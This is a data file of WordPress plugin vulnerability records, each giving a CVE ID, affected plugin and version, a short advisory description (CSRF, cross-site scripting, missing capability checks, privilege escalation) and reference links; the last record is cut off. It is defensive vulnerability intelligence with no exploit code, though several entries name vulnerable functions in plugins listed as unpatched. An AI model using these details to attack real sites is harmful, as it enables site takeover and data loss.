{"CVE_ID":"CVE-2023-0725","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.18.16. This is due to missing or incorrect nonce validation on the ajax_clone_folder function. This makes it possible for unauthenticated attackers to invoke this function via forged request granted they can trick a site administrator into performing an action such as clicking on a link leading them to perform actions intended for administrators such as changing the folder structure maintained by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80797183-c69f-4dce-a2e0-52a395ceffaa\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80797183-c69f-4dce-a2e0-52a395ceffaa\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5177","slug":"vrm360","versionImpact":"1.2.1","description":"The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 exposes the full path of a file when putting in a non-existent file in a parameter of the shortcode.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a67b9c21-a35a-4cdb-9627-a5932334e5f0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a67b9c21-a35a-4cdb-9627-a5932334e5f0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5506","slug":"imagemapper","versionImpact":"1.2.6","description":"The ImageMapper plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'imgmap_delete_area_ajax' function in versions up to, and including, 1.2.6. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to delete arbitrary posts and pages.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31dff395-c3ce-4ebe-8d38-5243fc4510d6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31dff395-c3ce-4ebe-8d38-5243fc4510d6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/imagemapper\\\/tags\\\/1.2.6\\\/imagemapper.php#L748\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/imagemapper\\\/tags\\\/1.2.6\\\/imagemapper.php#L748\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-40606","slug":"kanban","versionImpact":"2.5.21","description":"Improper Control of Generation of Code ('Code Injection') vulnerability in Kanban for WordPress Kanban Boards for WordPress.This issue affects Kanban Boards for WordPress: from n\/a through 2.5.21.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/kanban\\\/wordpress-kanban-boards-for-wordpress-plugin-2-5-21-arbitrary-code-execution-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/kanban\\\/wordpress-kanban-boards-for-wordpress-plugin-2-5-21-arbitrary-code-execution-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7074","slug":"wp-social-bookmark-menu","versionImpact":"1.2","description":"The WP SOCIAL BOOKMARK MENU WordPress plugin through 1.2 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7906c349-97b0-4d82-aef0-97a1175ae88e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7906c349-97b0-4d82-aef0-97a1175ae88e\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-7074.txt\",\"name\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-7074.txt\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1339","slug":"imagerecycle-pdf-image-compression","versionImpact":"3.1.13","description":"The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.13. This is due to missing or incorrect nonce validation on the reinitialize function. This makes it possible for unauthenticated attackers to remove all plugin data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d08e462-8297-477e-89da-47f26bd6beae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d08e462-8297-477e-89da-47f26bd6beae?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0385","slug":"categorify","versionImpact":"1.0.7.4","description":"The Categorify plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the categorifyAjaxAddCategory function in all versions up to, and including, 1.0.7.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to add categories.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c7c74cf-a109-4f77-a740-5a43ccd4e96a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c7c74cf-a109-4f77-a740-5a43ccd4e96a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1896","slug":"new-photo-gallery","versionImpact":"1.4.1","description":"The Photo Gallery \u2013 Responsive Photo Gallery, Image Gallery, Portfolio Gallery, Logo Gallery And Team Gallery plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.4.1 via deserialization via shortcode of untrusted input from the 'awl_lg_settings_' attribute. This makes it possible for authenticated attackers, with contributor access and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/14894c36-f657-4368-bc7f-60121ec08c13?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/14894c36-f657-4368-bc7f-60121ec08c13?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/new-photo-gallery\\\/tags\\\/1.4.0\\\/shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/new-photo-gallery\\\/tags\\\/1.4.0\\\/shortcode.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5149","slug":"buddyforms","versionImpact":"2.8.9","description":"The BuddyForms plugin for WordPress is vulnerable to Email Verification Bypass in all versions up to, and including, 2.8.9 via the use of an insufficiently random activation code. This makes it possible for unauthenticated attackers to bypass the email verification.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5c8d361-698b-4abd-bcdd-0361d3fd10c5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5c8d361-698b-4abd-bcdd-0361d3fd10c5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddyforms\\\/tags\\\/2.8.9\\\/includes\\\/wp-insert-user.php#L334\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddyforms\\\/tags\\\/2.8.9\\\/includes\\\/wp-insert-user.php#L334\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8045","slug":"advanced-backgrounds","versionImpact":"1.12.3","description":"The Advanced WordPress Backgrounds plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018imageTag\u2019 parameter in all versions up to, and including, 1.12.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78e49869-5e7e-45f2-8239-4df18b28db53?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78e49869-5e7e-45f2-8239-4df18b28db53?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-backgrounds\\\/trunk\\\/assets\\\/admin\\\/gutenberg\\\/index.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-backgrounds\\\/trunk\\\/assets\\\/admin\\\/gutenberg\\\/index.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/advanced-backgrounds\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/advanced-backgrounds\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-backgrounds\\\/trunk\\\/classes\\\/class-gutenberg.php#L146\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-backgrounds\\\/trunk\\\/classes\\\/class-gutenberg.php#L146\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-backgrounds\\\/trunk\\\/assets\\\/admin\\\/gutenberg\\\/block.json#L69\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-backgrounds\\\/trunk\\\/assets\\\/admin\\\/gutenberg\\\/block.json#L69\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147938\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147938\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10851","slug":"razorpay-payment-button","versionImpact":"2.4.6","description":"The Razorpay Payment Button Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.4.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c0e8e63-2603-4ee4-88f5-e132f9bc7fae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c0e8e63-2603-4ee4-88f5-e132f9bc7fae?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/razorpay-payment-button\\\/tags\\\/2.4.6\\\/includes\\\/rzp-payment-buttons.php#L78\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/razorpay-payment-button\\\/tags\\\/2.4.6\\\/includes\\\/rzp-payment-buttons.php#L78\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/razorpay-payment-button\\\/tags\\\/2.4.6\\\/includes\\\/rzp-subscription-buttons.php#L78\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/razorpay-payment-button\\\/tags\\\/2.4.6\\\/includes\\\/rzp-subscription-buttons.php#L78\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12018","slug":"shortcode-variables","versionImpact":"4.1.6","description":"The Snippet Shortcodes plugin for WordPress is vulnerable to unauthorized Shortcode Deletion due to missing authorization in all versions up to, and including, 4.1.6. Note that a nonce is used as authentication here, but the value is leaked. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete the plugin's Shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205481\\\/shortcode-variables\\\/trunk\\\/includes\\\/hooks.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205481\\\/shortcode-variables\\\/trunk\\\/includes\\\/hooks.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/shortcode-variables\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/shortcode-variables\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e6e8f68-6977-478a-b62e-0ec9385eb2af?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e6e8f68-6977-478a-b62e-0ec9385eb2af?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12221","slug":"weaver-for-bbpress","versionImpact":"1.6.3","description":"The Turnkey bbPress by WeaverTheme plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018_wpnonce\u2019 parameter in all versions up to, and including, 1.6.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3209473\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3209473\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/weaver-for-bbpress\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/weaver-for-bbpress\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35c608c3-9c28-4e0d-b0ec-d0a279fccd3b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35c608c3-9c28-4e0d-b0ec-d0a279fccd3b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-39417","slug":"redirect-to-welcome-or-landing-page","versionImpact":"2.0","description":"Cross-Site Request Forgery (CSRF) vulnerability in Eslam Mahmoud Redirect wordpress to welcome or landing page allows Stored XSS. This issue affects Redirect wordpress to welcome or landing page: from n\/a through 2.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/redirect-to-welcome-or-landing-page\\\/vulnerability\\\/wordpress-redirect-wordpress-to-welcome-or-landing-page-plugin-2-0-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/redirect-to-welcome-or-landing-page\\\/vulnerability\\\/wordpress-redirect-wordpress-to-welcome-or-landing-page-plugin-2-0-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5304","slug":"project-notebooks","versionImpact":"1.1.3","description":"The PT Project Notebooks plugin for WordPress is vulnerable to Privilege Escalation due to missing authorization in the wpnb_pto_new_users_add() function in versions 1.0.0 through 1.1.3. This makes it possible for unauthenticated attackers to elevate their privileges to that of an administrator.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/project-notebooks\\\/tags\\\/1.1.3\\\/includes\\\/structure\\\/admin\\\/pto_admin_settings.php#L233\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/project-notebooks\\\/tags\\\/1.1.3\\\/includes\\\/structure\\\/admin\\\/pto_admin_settings.php#L233\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/project-notebooks\\\/tags\\\/1.1.3\\\/includes\\\/structure\\\/admin\\\/pto_admin_settings.php#L36\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/project-notebooks\\\/tags\\\/1.1.3\\\/includes\\\/structure\\\/admin\\\/pto_admin_settings.php#L36\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/project-notebooks\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/project-notebooks\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/552ec9fc-5bff-4bee-be04-39892c89cd59?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/552ec9fc-5bff-4bee-be04-39892c89cd59?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0724","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.18.16. This is due to missing or incorrect nonce validation on the ajax_add_folder function. This makes it possible for unauthenticated attackers to invoke this function via forged request granted they can trick a site administrator into performing an action such as clicking on a link leading them to perform actions intended for administrators such as changing the folder structure maintained by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08c0ea6c-7e2f-482f-b30c-0e3bcd992159\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08c0ea6c-7e2f-482f-b30c-0e3bcd992159\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0502","slug":"wp-news-magazine","versionImpact":"1.1.9","description":"The WP News WordPress plugin through 1.1.9 does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c959f4ce-b6ea-4aee-9a98-aa98d2a62138\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c959f4ce-b6ea-4aee-9a98-aa98d2a62138\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3713","slug":"profilegrid-user-profiles-groups-and-communities","versionImpact":"5.5.1","description":"The ProfileGrid plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'profile_magic_check_smtp_connection' function in versions up to, and including, 5.5.1. This makes it possible for authenticated attackers, with subscriber-level permissions or above to update the site options arbitrarily. This can be used by attackers to achieve privilege escalation.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.4.8\\\/admin\\\/class-profile-magic-admin.php#L599\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.4.8\\\/admin\\\/class-profile-magic-admin.php#L599\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/473ba791-af99-4aae-99cb-ccf220e443e7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/473ba791-af99-4aae-99cb-ccf220e443e7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2938904\\\/profilegrid-user-profiles-groups-and-communities#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2938904\\\/profilegrid-user-profiles-groups-and-communities#file0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6946","slug":"autotitle-for-wordpress","versionImpact":"1.0.3","description":"The Autotitle for WordPress plugin through 1.0.3 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/54a00416-c7e3-44f3-8dd2-ed9e748055e6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/54a00416-c7e3-44f3-8dd2-ed9e748055e6\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-6946\",\"name\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-6946\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1338","slug":"imagerecycle-pdf-image-compression","versionImpact":"3.1.13","description":"The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.13. This is due to missing or incorrect nonce validation on the stopOptimizeAll function. This makes it possible for unauthenticated attackers to modify image optimization settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e3dd131-dbd8-431c-96f4-4ab2c3be4dbd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e3dd131-dbd8-431c-96f4-4ab2c3be4dbd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0377","slug":"lifterlms","versionImpact":"7.5.1","description":"The LifterLMS \u2013 WordPress LMS Plugin for eLearning plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'process_review' function in all versions up to, and including, 7.5.1. This makes it possible for unauthenticated attackers to publish an unrestricted number of reviews on the site.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d1f41400-5c59-444d-9c1e-121e83449521?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d1f41400-5c59-444d-9c1e-121e83449521?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3036762\\\/lifterlms\\\/tags\\\/7.5.2\\\/includes\\\/class.llms.review.php?old=2903997&old_path=lifterlms\\\/trunk\\\/includes\\\/class.llms.review.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3036762\\\/lifterlms\\\/tags\\\/7.5.2\\\/includes\\\/class.llms.review.php?old=2903997&old_path=lifterlms\\\/trunk\\\/includes\\\/class.llms.review.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5425","slug":"wp-jquery-lightbox","versionImpact":"1.5.4","description":"The WP jQuery Lightbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018title\u2019 attribute in all versions up to, and including, 1.5.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3439710-1159-4677-93c9-14bacfbf0b55?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3439710-1159-4677-93c9-14bacfbf0b55?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-jquery-lightbox\\\/trunk\\\/jquery.lightbox.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-jquery-lightbox\\\/trunk\\\/jquery.lightbox.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/lokesh\\\/lightbox2\\\/blob\\\/dev\\\/src\\\/js\\\/lightbox.js#L57\",\"name\":\"https:\\\/\\\/github.com\\\/lokesh\\\/lightbox2\\\/blob\\\/dev\\\/src\\\/js\\\/lightbox.js#L57\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097604\\\/#file8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097604\\\/#file8\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-jquery-lightbox\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-jquery-lightbox\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10850","slug":"razorpay-payment-button-elementor","versionImpact":"1.2.5","description":"The Razorpay Payment Button Elementor Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.2.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a 